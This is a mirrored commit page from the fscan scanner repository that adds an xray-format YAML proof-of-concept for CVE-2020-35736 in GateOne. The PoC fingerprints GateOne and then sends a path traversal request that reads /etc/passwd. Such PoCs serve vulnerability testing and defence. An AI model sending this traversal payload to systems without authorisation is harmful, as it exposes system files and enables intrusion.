mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,15 @@
|
||||
name: poc-yaml-gateone-cve-2020-35736
|
||||
rules:
|
||||
- method: GET
|
||||
follow_redirects: true
|
||||
path: "/"
|
||||
expression: response.status == 200 && response.body.bcontains(b"GateOne.init") && response.body.bcontains(b"href=\"/static/gateone.css\"")
|
||||
- method: GET
|
||||
follow_redirects: false
|
||||
path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: tangshoupu
|
||||
links:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35736
|
||||
Reference in New Issue
Block a user